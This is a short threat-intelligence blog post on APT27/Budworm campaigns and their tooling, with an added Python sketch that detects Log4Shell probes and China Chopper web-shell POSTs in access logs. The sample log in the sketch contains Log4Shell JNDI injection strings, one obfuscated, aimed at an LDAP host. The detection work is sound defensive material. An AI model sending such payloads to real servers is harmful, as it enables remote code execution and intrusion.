Budworm attacks again (allegedly)

Luis Alfonso Rodríguez de Trío
2 min read · Oct 15, 2022


Budworm, a.k.a. APT27, Bronze Union, Emissary Panda, TG-3390, Red Phoenix and LuckyMouse, seems to have resurfaced after several attacks against Asian (health and industry) and Middle Eastern (government) targets. Moreover, Symantec reports what appears to be a targeting shift, after the group was recently linked to attacks on an unnamed U.S. state legislature.

Earlier this month, several U.S. security agencies disclosed information about a breach of an industrial defense organization, attributed to multiple nation-state hacking groups. What links this coordinated attack to our old adversary APT27 is the use of the HyperBro backdoor, which has been a classic part of their technique arsenal since at least 2013 and has undergone continuous retooling. The use of the China Chopper web shell and the PlugX RAT is also a giveaway.

In fact, the TTPs of the recent attacks show a recognizable pattern of operational flexibility and adaptability: using the Microsoft Exchange ProxyLogon vulnerability to exploit the target systems, then dropping China Chopper and HyperBro. Another attack vector of choice is the exploitation of Log4Shell flaws to compromise servers, delivering via web shells (China Chopper) the malware team: the HyperBro backdoor, the PlugX RAT, the Cobalt Strike post-exploitation framework (a typical weaponization of a legitimate tool) and credential-dumping software (frequently Mimikatz).
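From a defender's side, both intrusion paths above leave traces in web server access logs: Log4Shell attempts carry a JNDI lookup string in an attacker-controlled field, and a China Chopper style web shell is driven by POST requests to a script file that should never receive them. The following detection sketch is an added example, not code from the article or from Symantec; the log lines, the watched Exchange directories and the known-good list are constructed assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed IIS-style access log (not from any real incident):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = """\
2022-10-01 08:00:01 203.0.113.5 GET /owa/auth/logon.aspx - 200 Mozilla/5.0
2022-10-01 08:00:07 203.0.113.5 POST /owa/auth/logon.aspx - 200 Mozilla/5.0
2022-10-01 08:02:14 198.51.100.7 POST /aspnet_client/help.aspx - 200 python-requests/2.28
2022-10-01 08:03:30 198.51.100.9 GET /api/search q=${jndi:ldap://198.51.100.9/a} 500 curl/7.85
2022-10-01 08:03:31 198.51.100.9 GET /api/search - 200 ${${lower:j}ndi:ldap://198.51.100.9/b}
"""

# Log4j lookups that attackers nest to hide the literal "jndi" token
LOOKUP_NOISE = re.compile(r"\$\{(?:lower|upper):([^}]+)\}|\$\{::-([^}]+)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def normalize_lookups(s: str) -> str:
    """Collapse ${lower:x}, ${upper:x} and ${::-x} to the character(s) they
    evaluate to, repeating until nothing changes, so nested obfuscation unwinds."""
    prev = None
    while prev != s:
        prev = s
        s = LOOKUP_NOISE.sub(lambda m: m.group(1) or m.group(2), s)
    return s

WATCHED_DIRS = ("/owa/auth/", "/aspnet_client/")   # assumption: illustrative watchlist
KNOWN_GOOD = {"/owa/auth/logon.aspx"}               # assumption: legitimately POSTed pages
SCRIPT_EXT = (".aspx", ".ashx", ".asmx", ".jsp", ".php")

def analyse(log: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: Log4Shell probe or web shell use."""
    findings = []
    for line in log.splitlines():
        parts = line.split(" ", 7)
        if len(parts) < 8:
            continue                     # malformed line, skip rather than crash
        _, _, ip, method, uri, query, _, ua = parts
        # Rule 1: JNDI lookup in any attacker-controlled field (after de-obfuscation)
        for field in (uri, query, ua):
            if JNDI.search(normalize_lookups(field)):
                findings.append({"ip": ip, "rule": "log4shell_jndi", "evidence": field})
                break
        # Rule 2: POST to a script in a watched directory that is not a known POST target
        u = uri.lower()
        if method == "POST" and u.endswith(SCRIPT_EXT) and u.startswith(WATCHED_DIRS) and u not in KNOWN_GOOD:
            findings.append({"ip": ip, "rule": "webshell_post", "evidence": uri})
    return findings
```

Rule 2 deliberately keeps the OWA logon page out of the alerts: the value of the heuristic lies in the allowlist, since a POST to a freshly created .aspx file in those directories is exactly what a dropped China Chopper looks like in the log.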

MITRE ATT&CK matrix: I’ve used the following colour scheme:

· RED: Techniques cited in this article.

· ORANGE: Techniques related to living-off-the-land binaries or co-opted legitimate tools.

You can check the APT27 TTP matrix in this link.

Check the Mandiant APT list.

Luis Alfonso Rodríguez de Trío

Internal Audit Tech & Cybersec / Senior Cybersecurity Leadership / IT Director. MBA, CCISO, CISM, CEH, CHFI, ECIH, Security +, ECI.